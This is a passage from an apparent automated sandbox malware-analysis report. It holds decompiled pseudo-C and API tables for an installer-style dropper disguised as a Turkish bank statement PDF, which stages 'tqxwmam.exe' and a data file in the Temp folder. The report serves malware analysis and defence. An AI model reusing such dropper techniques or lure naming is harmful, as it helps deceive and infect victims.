								__eflags =  *0x42a2ec - _t136;
								if( *0x42a2ec != _t136) {
									goto L63;
								}
								__eflags =  *0x42a2e0 - _t136;
								if( *0x42a2e0 != _t136) {
									continue;
								}
								goto L63;
							}
						}
						DestroyWindow( *0x429238); // executed
						 *0x42a268 = _t136;
						EndDialog(_t127,  *0x421f18);
						goto L60;
					} else {
						__eflags = _t34 - 1;
						if(_t34 != 1) {
							L35:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L63;
							}
							goto L36;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L35;
						}
						SendMessageW( *0x429238, 0x40f, 0, 1);
						__eflags =  *0x42922c;
						return 0 |  *0x42922c == 0x00000000;
					}
				} else {
					_t127 = _a4;
					_t136 = 0;
					if(_t130 == 0x47) {
						SetWindowPos( *0x423728, _t127, 0, 0, 0, 0, 0x13);
					}
					_t122 = _a12;
					if(_t130 != 5) {
						L8:
						if(_t130 != 0x40d) {
							__eflags = _t130 - 0x11;
							if(_t130 != 0x11) {
								__eflags = _t130 - 0x111;
								if(_t130 != 0x111) {
									goto L28;
								}
								_t135 = _t122 & 0x0000ffff;
								_t128 = GetDlgItem(_t127, _t135);
								__eflags = _t128 - _t136;
								if(_t128 == _t136) {
									L15:
									__eflags = _t135 - 1;
									if(_t135 != 1) {
										__eflags = _t135 - 3;
										if(_t135 != 3) {
											_t129 = 2;
											__eflags = _t135 - _t129;
											if(_t135 != _t129) {
												L27:
												SendMessageW( *0x429238, 0x111, _t122, _a16);
												goto L28;
											}
											__eflags =  *0x42a2ec - _t136;
											if( *0x42a2ec == _t136) {
												_t99 = E0040140B(3);
												__eflags = _t99;
												if(_t99 != 0) {
													goto L28;
												}
												 *0x421f18 = 1;
												L23:
												_push(0x78);
												L24:
												E0040459D();
												goto L28;
											}
											E0040140B(_t129);
											 *0x421f18 = _t129;
											goto L23;
										}
										__eflags =  *0x40a39c - _t136; // 0x0
										if(__eflags <= 0) {
											goto L27;
										}
										_push(0xffffffff);
										goto L24;
									}
									_push(_t135);
									goto L24;
								}
								SendMessageW(_t128, 0xf3, _t136, _t136);
								_t103 = IsWindowEnabled(_t128);
								__eflags = _t103;
								if(_t103 == 0) {
									L63:
									return 0;
								}
								goto L15;
							}
							SetWindowLongW(_t127, _t136, _t136);
							return 1;
						}
						DestroyWindow( *0x429238);
						 *0x429238 = _t122;
						L60:
						_t145 =  *0x425748 - _t136; // 0x0
						if(_t145 == 0 &&  *0x429238 != _t136) {
							ShowWindow(_t127, 0xa);
							 *0x425748 = 1;
						}
						goto L63;
					} else {
						asm("sbb eax, eax");
						ShowWindow( *0x423728,  ~(_t122 - 1) & 0x00000005);
						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
							L28:
							return E0040462B(_a8, _t122, _a16);
						} else {
							ShowWindow(_t127, 4);
							goto L8;
						}
					}
				}
			}
































                                                    0x004040d0
                                                    0x004040d7
                                                    0x0040423e
                                                    0x00404242
                                                    0x00404246
                                                    0x00404248
                                                    0x0040424d
                                                    0x00404258
                                                    0x00404263
                                                    0x00404268
                                                    0x0040426a
                                                    0x0040426c
                                                    0x0040426f
                                                    0x00404274
                                                    0x00404282
                                                    0x0040428f
                                                    0x00404296
                                                    0x00404296
                                                    0x00404297
                                                    0x00404297
                                                    0x0040429c
                                                    0x004042a2
                                                    0x004042a9
                                                    0x004042af
                                                    0x004042b1
                                                    0x004042f1
                                                    0x004042f6
                                                    0x004042fb
                                                    0x004042fb
                                                    0x00404300
                                                    0x00404309
                                                    0x0040430b
                                                    0x00404310
                                                    0x00404316
                                                    0x0040431a
                                                    0x0040431a
                                                    0x0040431f
                                                    0x00404325
                                                    0x00000000
                                                    0x00000000
                                                    0x00404330
                                                    0x00404336
                                                    0x00000000
                                                    0x00000000
                                                    0x0040433f
                                                    0x00404347
                                                    0x0040434c
                                                    0x0040434f
                                                    0x00404355
                                                    0x0040435a
                                                    0x0040435d
                                                    0x00404363
                                                    0x00404368
                                                    0x0040436b
                                                    0x00404371
                                                    0x00404379
                                                    0x0040437f
                                                    0x00404385
                                                    0x00404389
                                                    0x00404390
                                                    0x00404390
                                                    0x00404390
                                                    0x0040439a
                                                    0x004043ac
                                                    0x004043b8
                                                    0x004043bd
                                                    0x004043c7
                                                    0x004043cd
                                                    0x004043cf
                                                    0x004043d4
                                                    0x004043d1
                                                    0x004043d1
                                                    0x004043d1
                                                    0x004043e4
                                                    0x004043fc
                                                    0x004043fe
                                                    0x00404404
                                                    0x00404419
                                                    0x00404406
                                                    0x0040440f
                                                    0x00404411
                                                    0x00404411
                                                    0x0040441f
                                                    0x00404430
                                                    0x00404446
                                                    0x0040444d
                                                    0x00404453
                                                    0x00404457
                                                    0x0040445c
                                                    0x0040445e
                                                    0x00000000
                                                    0x00404464
                                                    0x00404464
                                                    0x00404466
                                                    0x00000000
                                                    0x00000000
                                                    0x0040446c
                                                    0x00404470
                                                    0x00404495
                                                    0x0040449b
                                                    0x004044a1
                                                    0x004044a3
                                                    0x00000000
                                                    0x00000000
                                                    0x004044c9
                                                    0x004044cf
                                                    0x004044d1
                                                    0x004044d6
                                                    0x00000000
                                                    0x00000000
                                                    0x004044dc
                                                    0x004044df
                                                    0x004044e2
                                                    0x004044f9
                                                    0x00404505
                                                    0x0040451e
                                                    0x00404524
                                                    0x00404528
                                                    0x0040452d
                                                    0x00404533
                                                    0x00000000
                                                    0x00000000
                                                    0x0040453d
                                                    0x00404548
                                                    0x00000000
                                                    0x00404548
                                                    0x00404472
                                                    0x00404478
                                                    0x00000000
                                                    0x00000000
                                                    0x0040447e
                                                    0x00404484
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0040448a
                                                    0x0040445e
                                                    0x00404555
                                                    0x00404561
                                                    0x00404568
                                                    0x00000000
                                                    0x004042b3
                                                    0x004042b3
                                                    0x004042b6
                                                    0x004042e9
                                                    0x004042e9
                                                    0x004042eb
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x004042eb
                                                    0x004042b8
                                                    0x004042bc
                                                    0x004042c1
                                                    0x004042c3
                                                    0x00000000
                                                    0x00000000
                                                    0x004042d3
                                                    0x004042db
                                                    0x00000000
                                                    0x004042e1
                                                    0x004040e9
                                                    0x004040e9
                                                    0x004040ed
                                                    0x004040f2
                                                    0x00404101
                                                    0x00404101
                                                    0x00404107
                                                    0x0040410e
                                                    0x00404152
                                                    0x00404158
                                                    0x00404171
                                                    0x00404174
                                                    0x00404187
                                                    0x0040418d
                                                    0x00000000
                                                    0x00000000
                                                    0x00404193
                                                    0x0040419e
                                                    0x004041a0
                                                    0x004041a2
                                                    0x004041c1
                                                    0x004041c1
                                                    0x004041c4
                                                    0x004041c9
                                                    0x004041cc
                                                    0x004041dc
                                                    0x004041dd
                                                    0x004041df
                                                    0x00404215
                                                    0x00404225
                                                    0x00000000
                                                    0x00404225
                                                    0x004041e1
                                                    0x004041e7
                                                    0x00404200
                                                    0x00404205
                                                    0x00404207
                                                    0x00000000
                                                    0x00000000
                                                    0x00404209
                                                    0x004041f5
                                                    0x004041f5
                                                    0x004041f7
                                                    0x004041f7
                                                    0x00000000
                                                    0x004041f7
                                                    0x004041ea
                                                    0x004041ef
                                                    0x00000000
                                                    0x004041ef
                                                    0x004041ce
                                                    0x004041d4
                                                    0x00000000
                                                    0x00000000
                                                    0x004041d6
                                                    0x00000000
                                                    0x004041d6
                                                    0x004041c6
                                                    0x00000000
                                                    0x004041c6
                                                    0x004041ac
                                                    0x004041b3
                                                    0x004041b9
                                                    0x004041bb
                                                    0x00404591
                                                    0x00000000
                                                    0x00404591
                                                    0x00000000
                                                    0x004041bb
                                                    0x00404179
                                                    0x00000000
                                                    0x00404181
                                                    0x00404160
                                                    0x00404166
                                                    0x0040456e
                                                    0x0040456e
                                                    0x00404574
                                                    0x00404581
                                                    0x00404587
                                                    0x00404587
                                                    0x00000000
                                                    0x00404110
                                                    0x00404115
                                                    0x00404121
                                                    0x0040412a
                                                    0x0040422b
                                                    0x00000000
                                                    0x00404149
                                                    0x0040414c
                                                    0x00000000
                                                    0x0040414c
                                                    0x0040412a
                                                    0x0040410e

                                                    APIs
                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404101
                                                    • ShowWindow.USER32(?), ref: 00404121
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00404133
                                                    • ShowWindow.USER32(?,00000004), ref: 0040414C
                                                    • DestroyWindow.USER32 ref: 00404160
                                                    • SetWindowLongW.USER32 ref: 00404179
                                                    • GetDlgItem.USER32 ref: 00404198
                                                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041AC
                                                    • IsWindowEnabled.USER32(00000000), ref: 004041B3
                                                    • GetDlgItem.USER32 ref: 0040425E
                                                    • GetDlgItem.USER32 ref: 00404268
                                                    • KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00404282
                                                    • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004042D3
                                                    • GetDlgItem.USER32 ref: 00404379
                                                    • ShowWindow.USER32(00000000,?), ref: 0040439A
                                                    • EnableWindow.USER32(?,?), ref: 004043AC
                                                    • EnableWindow.USER32(?,?), ref: 004043C7
                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004043DD
                                                    • EnableMenuItem.USER32 ref: 004043E4
                                                    • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004043FC
                                                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040440F
                                                    • lstrlenW.KERNEL32(00423748,?,00423748,00000000), ref: 00404439
                                                    • SetWindowTextW.USER32(?,00423748), ref: 0040444D
                                                    • ShowWindow.USER32(?,0000000A), ref: 00404581
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.306521689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.306515084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306533062.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306575632.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                    Similarity
                                                    • API ID: Window$Item$MessageSendShow$Enable$LongMenu$CallbackDestroyDispatcherEnabledSystemTextUserlstrlen
                                                    • String ID: H7B
                                                    • API String ID: 2475350683-2300413410
                                                    • Opcode ID: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                                                    • Instruction ID: 1d4a55fced449df2e2a9dfc159c1061f424388fbea236c5341ec002980a30b6c
                                                    • Opcode Fuzzy Hash: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                                                    • Instruction Fuzzy Hash: C0C1C2B1600604FBDB216F61EE85E2A3B78EB85745F40097EF781B51F0CB3958529B2E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00403D17 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215stringregistryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 248 403d17-403d2f call 406a35 251 403d31-403d41 call 4065af 248->251 252 403d43-403d7a call 406536 248->252 261 403d9d-403dc6 call 403fed call 40603f 251->261 257 403d92-403d98 lstrcatW 252->257 258 403d7c-403d8d call 406536 252->258 257->261 258->257 266 403e58-403e60 call 40603f 261->266 267 403dcc-403dd1 261->267 273 403e62-403e69 call 4066a5 266->273 274 403e6e-403e93 LoadImageW 266->274 267->266 269 403dd7-403dff call 406536 267->269 269->266 275 403e01-403e05 269->275 273->274 277 403f14-403f1c call 40140b 274->277 278 403e95-403ec5 RegisterClassW 274->278 279 403e17-403e23 lstrlenW 275->279 280 403e07-403e14 call 405f64 275->280 291 403f26-403f31 call 403fed 277->291 292 403f1e-403f21 277->292 281 403fe3 278->281 282 403ecb-403f0f SystemParametersInfoW CreateWindowExW 278->282 286 403e25-403e33 lstrcmpiW 279->286 287 403e4b-403e53 call 405f37 call 406668 279->287 280->279 285 403fe5-403fec 281->285 282->277 286->287 290 403e35-403e3f GetFileAttributesW 286->290 287->266 294 403e41-403e43 290->294 295 403e45-403e46 call 405f83 290->295 301 403f37-403f51 ShowWindow call 4069c5 291->301 302 403fba-403fc2 call 40579d 291->302 292->285 294->287 294->295 295->287 307 403f53-403f58 call 4069c5 301->307 308 403f5d-403f6f GetClassInfoW 301->308 309 403fc4-403fca 302->309 310 403fdc-403fde call 40140b 302->310 307->308 313 403f71-403f81 GetClassInfoW RegisterClassW 308->313 314 403f87-403faa DialogBoxParamW call 40140b 308->314 309->292 315 403fd0-403fd7 call 40140b 309->315 310->281 313->314 319 403faf-403fb8 call 403c67 314->319 315->292 319->285
                                                    C-Code - Quality: 96%
                                                    			E00403D17(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x42a270;
				_t22 = E00406A35(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x423748;
					L"1033" = 0x30;
					 *0x437002 = 0x78;
					 *0x437004 = 0;
					E00406536(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x423748, 0);
					__eflags =  *0x423748;
					if(__eflags == 0) {
						E00406536(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x423748, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					E004065AF(L"1033",  *_t22() & 0x0000ffff);
				}
				E00403FED(_t78, _t90);
				_t86 = L"C:\\Users\\alfons\\AppData\\Local\\Temp";
				 *0x42a2e0 =  *0x42a278 & 0x00000020;
				 *0x42a2fc = 0x10000;
				if(E0040603F(_t90, L"C:\\Users\\alfons\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E0040603F(_t98, _t86) == 0) {
						E004066A5(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
					}
					_t30 = LoadImageW( *0x42a260, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x429248 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403FED(_t78, __eflags);
							__eflags =  *0x42a300;
							if( *0x42a300 != 0) {
								_t33 = E0040579D(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42922c;
								if( *0x42922c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x423728, 5); // executed
							_t39 = E004069C5("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E004069C5("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x429200);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x429200);
								 *0x429224 = _t87;
								RegisterClassW(0x429200);
							}
							_t44 = DialogBoxParamW( *0x42a260,  *0x429240 + 0x00000069 & 0x0000ffff, 0, E004040C5, 0); // executed
							E00403C67(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x42a260;
						 *0x429204 = E00401000;
						 *0x429210 =  *0x42a260;
						 *0x429214 = _t30;
						 *0x429224 = 0x40a3b4;
						if(RegisterClassW(0x429200) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x423728 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a260, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x428200;
					E00406536(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x42a298 + _t78 * 2,  *0x42a298 +  *(_t82 + 0x4c) * 2, 0x428200, 0);
					_t63 =  *0x428200; // 0x22
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x428202;
						 *((short*)(E00405F64(0x428202, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E00406668(_t86, E00405F37(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405F83(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}
























                                                    0x00403d1d
                                                    0x00403d26
                                                    0x00403d2d
                                                    0x00403d2f
                                                    0x00403d43
                                                    0x00403d55
                                                    0x00403d5e
                                                    0x00403d67
                                                    0x00403d6e
                                                    0x00403d73
                                                    0x00403d7a
                                                    0x00403d8d
                                                    0x00403d8d
                                                    0x00403d98
                                                    0x00403d31
                                                    0x00403d3c
                                                    0x00403d3c
                                                    0x00403d9d
                                                    0x00403da7
                                                    0x00403db0
                                                    0x00403db5
                                                    0x00403dc6
                                                    0x00403e58
                                                    0x00403e60
                                                    0x00403e69
                                                    0x00403e69
                                                    0x00403e7f
                                                    0x00403e85
                                                    0x00403e93
                                                    0x00403f14
                                                    0x00403f1c
                                                    0x00403f26
                                                    0x00403f2b
                                                    0x00403f31
                                                    0x00403fbb
                                                    0x00403fc0
                                                    0x00403fc2
                                                    0x00403fde
                                                    0x00000000
                                                    0x00403fde
                                                    0x00403fc4
                                                    0x00403fca
                                                    0x00403fd2
                                                    0x00403fd2
                                                    0x00000000
                                                    0x00403fca
                                                    0x00403f3f
                                                    0x00403f4a
                                                    0x00403f4f
                                                    0x00403f51
                                                    0x00403f58
                                                    0x00403f58
                                                    0x00403f63
                                                    0x00403f6b
                                                    0x00403f6d
                                                    0x00403f6f
                                                    0x00403f78
                                                    0x00403f7b
                                                    0x00403f81
                                                    0x00403f81
                                                    0x00403fa0
                                                    0x00403fb1
                                                    0x00000000
                                                    0x00403fb6
                                                    0x00403f1e
                                                    0x00403f20
                                                    0x00000000
                                                    0x00403e95
                                                    0x00403e95
                                                    0x00403ea1
                                                    0x00403eab
                                                    0x00403eb1
                                                    0x00403eb6
                                                    0x00403ec5
                                                    0x00403fe3
                                                    0x00403fe3
                                                    0x00000000
                                                    0x00403fe3
                                                    0x00403ed4
                                                    0x00403f0f
                                                    0x00000000
                                                    0x00403f0f
                                                    0x00403dcc
                                                    0x00403dcc
                                                    0x00403dcf
                                                    0x00403dd1
                                                    0x00000000
                                                    0x00000000
                                                    0x00403ddf
                                                    0x00403df1
                                                    0x00403df6
                                                    0x00403dff
                                                    0x00000000
                                                    0x00000000
                                                    0x00403e05
                                                    0x00403e07
                                                    0x00403e14
                                                    0x00403e14
                                                    0x00403e1d
                                                    0x00403e23
                                                    0x00403e4b
                                                    0x00403e53
                                                    0x00000000
                                                    0x00403e35
                                                    0x00403e36
                                                    0x00403e3f
                                                    0x00403e45
                                                    0x00403e46
                                                    0x00000000
                                                    0x00403e46
                                                    0x00403e41
                                                    0x00403e43
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00403e43
                                                    0x00403e23

                                                    APIs
                                                      • Part of subcall function 00406A35: GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                                                      • Part of subcall function 00406A35: GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                                                    • lstrcatW.KERNEL32(1033,00423748), ref: 00403D98
                                                    • lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\tqxwmam.exe" C:\Users\user\AppData\Local\Temp\wjybinpf.dj,?,?,?,"C:\Users\user\AppData\Local\Temp\tqxwmam.exe" C:\Users\user\AppData\Local\Temp\wjybinpf.dj,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,766DFAA0), ref: 00403E18
                                                    • lstrcmpiW.KERNEL32(?,.exe,"C:\Users\user\AppData\Local\Temp\tqxwmam.exe" C:\Users\user\AppData\Local\Temp\wjybinpf.dj,?,?,?,"C:\Users\user\AppData\Local\Temp\tqxwmam.exe" C:\Users\user\AppData\Local\Temp\wjybinpf.dj,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403E2B
                                                    • GetFileAttributesW.KERNEL32("C:\Users\user\AppData\Local\Temp\tqxwmam.exe" C:\Users\user\AppData\Local\Temp\wjybinpf.dj,?,00000000,?), ref: 00403E36
                                                    • LoadImageW.USER32 ref: 00403E7F
                                                      • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                                                    • RegisterClassW.USER32 ref: 00403EBC
                                                    • SystemParametersInfoW.USER32 ref: 00403ED4
                                                    • CreateWindowExW.USER32 ref: 00403F09
                                                    • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403F3F
                                                    • GetClassInfoW.USER32 ref: 00403F6B
                                                    • GetClassInfoW.USER32 ref: 00403F78
                                                    • RegisterClassW.USER32 ref: 00403F81
                                                    • DialogBoxParamW.USER32 ref: 00403FA0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.306521689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.306515084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306533062.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306575632.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                    Similarity
                                                    • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                    • String ID: "C:\Users\user\AppData\Local\Temp\tqxwmam.exe" C:\Users\user\AppData\Local\Temp\wjybinpf.dj$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$H7B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                    • API String ID: 1975747703-1903045236
                                                    • Opcode ID: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
                                                    • Instruction ID: e235badc60aeba35c86cf297cd954ec43a22164425911800af60bc979c7621a1
                                                    • Opcode Fuzzy Hash: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
                                                    • Instruction Fuzzy Hash: E661D570640201BAD730AF66AD45E2B3A7CEB84B49F40457FF945B22E1DB3D5911CA3D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004030D0 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 204memoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 322 4030d0-40311e GetTickCount GetModuleFileNameW call 406158 325 403120-403125 322->325 326 40312a-403158 call 406668 call 405f83 call 406668 GetFileSize 322->326 327 40336a-40336e 325->327 334 403243-403251 call 40302e 326->334 335 40315e 326->335 341 403322-403327 334->341 342 403257-40325a 334->342 337 403163-40317a 335->337 339 40317c 337->339 340 40317e-403187 call 4035e2 337->340 339->340 348 40318d-403194 340->348 349 4032de-4032e6 call 40302e 340->349 341->327 344 403286-4032d2 GlobalAlloc call 406b90 call 406187 CreateFileW 342->344 345 40325c-403274 call 4035f8 call 4035e2 342->345 373 4032d4-4032d9 344->373 374 4032e8-403318 call 4035f8 call 403371 344->374 345->341 368 40327a-403280 345->368 353 403210-403214 348->353 354 403196-4031aa call 406113 348->354 349->341 358 403216-40321d call 40302e 353->358 359 40321e-403224 353->359 354->359 371 4031ac-4031b3 354->371 358->359 364 403233-40323b 359->364 365 403226-403230 call 406b22 359->365 364->337 372 403241 364->372 365->364 368->341 368->344 371->359 377 4031b5-4031bc 371->377 372->334 373->327 383 40331d-403320 374->383 377->359 379 4031be-4031c5 377->379 379->359 380 4031c7-4031ce 379->380 380->359 382 4031d0-4031f0 380->382 382->341 384 4031f6-4031fa 382->384 383->341 385 403329-40333a 383->385 386 403202-40320a 384->386 387 4031fc-403200 384->387 388 403342-403347 385->388 389 40333c 385->389 386->359 390 40320c-40320e 386->390 387->372 387->386 391 403348-40334e 388->391 389->388 390->359 391->391 392 403350-403368 call 406113 391->392 392->327
                                                    C-Code - Quality: 98%
                                                    			E004030D0(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				short _v560;
				long _t54;
				void* _t57;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				long _t82;
				signed int _t89;
				intOrPtr _t92;
				long _t94;
				void* _t102;
				void* _t106;
				long _t107;
				long _t110;
				void* _t111;

				_t94 = 0;
				_v8 = 0;
				_v12 = 0;
				 *0x42a26c = GetTickCount() + 0x3e8;
				GetModuleFileNameW(0, L"C:\\Users\\alfons\\Desktop\\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe", 0x400);
				_t106 = E00406158(L"C:\\Users\\alfons\\Desktop\\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe", 0x80000000, 3);
				 *0x40a018 = _t106;
				if(_t106 == 0xffffffff) {
					return L"Error launching installer";
				}
				E00406668(L"C:\\Users\\alfons\\Desktop", L"C:\\Users\\alfons\\Desktop\\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe");
				E00406668(0x439000, E00405F83(L"C:\\Users\\alfons\\Desktop"));
				_t54 = GetFileSize(_t106, 0);
				 *0x420f00 = _t54;
				_t110 = _t54;
				if(_t54 <= 0) {
					L24:
					E0040302E(1);
					if( *0x42a274 == _t94) {
						goto L32;
					}
					if(_v12 == _t94) {
						L28:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t111 = _t57;
						E00406B90(0x40ce68);
						E00406187(0x40ce68,  &_v560, L"C:\\Users\\alfons\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileW( &_v560, 0xc0000000, _t94, _t94, 2, 0x4000100, _t94); // executed
						 *0x40a01c = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E004035F8( *0x42a274 + 0x1c);
							 *0x420f04 = _t65;
							 *0x420ef8 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E00403371(_v16, 0xffffffff, _t94, _t111, _v20); // executed
							if(_t68 == _v20) {
								 *0x42a270 = _t111;
								 *0x42a278 =  *_t111;
								if((_v40 & 0x00000001) != 0) {
									 *0x42a27c =  *0x42a27c + 1;
								}
								_t45 = _t111 + 0x44; // 0x44
								_t70 = _t45;
								_t102 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t111;
									_t102 = _t102 - 1;
								} while (_t102 != 0);
								 *((intOrPtr*)(_t111 + 0x3c)) =  *0x420ef4;
								E00406113(0x42a280, _t111 + 4, 0x40);
								return 0;
							}
							goto L32;
						}
						return L"Error writing temporary file. Make sure your temp folder is valid.";
					}
					E004035F8( *0x420ef0);
					if(E004035E2( &_a4, 4) == 0 || _v8 != _a4) {
						goto L32;
					} else {
						goto L28;
					}
				} else {
					do {
						_t107 = _t110;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x42a274) & 0x00007e00) + 0x200;
						if(_t110 >= _t82) {
							_t107 = _t82;
						}
						if(E004035E2(0x418ef0, _t107) == 0) {
							E0040302E(1);
							L32:
